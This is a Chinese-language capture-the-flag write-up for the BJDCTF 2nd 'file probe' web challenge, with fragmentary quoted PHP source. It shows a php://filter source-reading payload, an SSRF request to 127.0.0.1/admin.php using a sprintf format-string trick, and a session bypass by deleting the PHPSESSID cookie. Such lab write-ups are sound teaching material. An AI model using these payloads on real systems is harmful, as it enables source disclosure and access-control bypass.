[BJDCTF 2nd]文件探测

题目

过程
1.f12发现hint，里面有home.php。

进入home.php，发现url改变，想到php伪协议
/home.php?file=system
尝试php://filter/read=convert.base64-encode/resource=home.php发现报错，联想之前的一个题，可能进去之后自己拼接php，将.php去掉。
读到源码。里面有很多过滤，自己注释一下。

";
        require $file;
    }
} else {
    echo "";
}

2.读system.php源码

alert('why you are here!');alert('fxck your scanner');alert('fxck you! get out!');";
    header("Refresh:0.1;url=index.php");
    die;
}

$str2 = '       Error:  url invalid
~$ ';
$str3 = '       Error:  damn hacker!
~$ ';
$str4 = '       Error:  request method error
~$ ';

?>

";

    echo $str1;

    if (!preg_match($filter1, $url) ){
        die($str2);
    }
    if (preg_match($filter2, $url)) {
        die($str3);
    }
    if (!preg_match('/^GET/i', $method) && !preg_match('/^POST/i', $method)) {
        die($str4);
    }
    $detect = @file_get_contents($url, false);
    print(sprintf("$url method&content_size:$method%d", $detect));
}

?>

重点在下半部分。传的参数不能有flag。请求头必须是127.0.0.1
三个post的参数
q1：没有什么过滤
q2：后面拼接y1ng.txt。后面加一个注释符#让其失效。
q3：字符串要么get开头，要么post开头
看到$str1 = "~$ python fuck.py -u \"".$url ."\" -M $method -U y1ng -P admin123123 --neglect-negative --debug --hint=xiangdemei
";结合下面的file_get_contents()函数，这里感觉还会有一个admin.php等着我们去读取。
######重点：

$detect = @file_get_contents($url, false);
print(sprintf("$url method&content_size:$method%d", $detect));

这里有一个%d，会使我们读到的源码，以二进制的形式输出。而我们要做的就是让源码以%s字符串格式输出。此处参考Ye’s师傅第一个方法。

1. %1$s —— 这种办法原理是%1$s会将第一个参数用string类型输出，而这道题中第一个参数便是admin.php的源码，语句是：
   print(sprintf("$url method&content_size:"GET%1\$s%d", \$detect)); %1$s会以字符串格式输出$detect，而%d会输出0
   2.将%d转义掉，替换成%s从而输出字符串。对于sprintf()函数，对百分号的转义是用2个%而不是反斜线
   print(sprintf("\$url method&content_size:"GET%s%%d", \$detect)); %d前的%被转义，因此失效。
   最终读取admin.php的payload为
   q1=1&q2=http://127.0.0.1/admin.php#&q3=GET%s%
   
   3.读到admin.php源码。

only 127.0.0.1 can access! You know what I mean right?
your ip address is " . $_SERVER['REMOTE_ADDR'];
}


$_SESSION['user'] = md5($_SERVER['REMOTE_ADDR']);

if (isset($_GET['decrypt'])) {   //只要传入decrypt参数就不会生成随机数
    $decr = $_GET['decrypt'];
    if (Check()){
        $data = $_SESSION['secret'];
        include 'flag_2sln2ndln2klnlksnf.php';
        $cipher = aesEn($data, 'y1ng');  //注意！这里加密的内容是从SESSION中取的，突破点就在这里
        if ($decr === $cipher){
            echo WHAT_YOU_WANT;   
        } else {
            die('爬');
        }
    } else{
        header("Refresh:0.1;url=index.php");
    }
} else {
    //I heard you can break PHP mt_rand seed
    mt_srand(rand(0,9999999));   //这里的种子是真随机了，无法爆破
    $length = mt_rand(40,80);
    $_SESSION['secret'] = bin2hex(random_bytes($length));
}
?>

php种子，这次是真随机了。没法爆破。看一下算法。
对那个随机数$_SESSION[‘secret’]进行aes加密操作，如果加密结果和我们传进去的decrypt相同就会输出flag：
这个生成的不能被破解的随机字符串被放在了session中，如果没有了session就没有了这个随机字符串，只要通过删除PHPSESSID将SESSION置空即可。

session绕过。删除cookie，没有cookie中的SESSIONID就找不到对应的session文件，相应的$_SESSION[‘var’]就为NULL，传参NULL。
引用自: https://www.jianshu.com/p/9c031dee57b7
这样一来就有了思路，访问admin.php时删除cookie。
4.此处计算aes的脚本。

这里还有个坑，密钥中是有+符号的，直接用明文去访问得不到Flag！所以URL编码一下，然后删除掉SESSION再访问就可以得到Flag: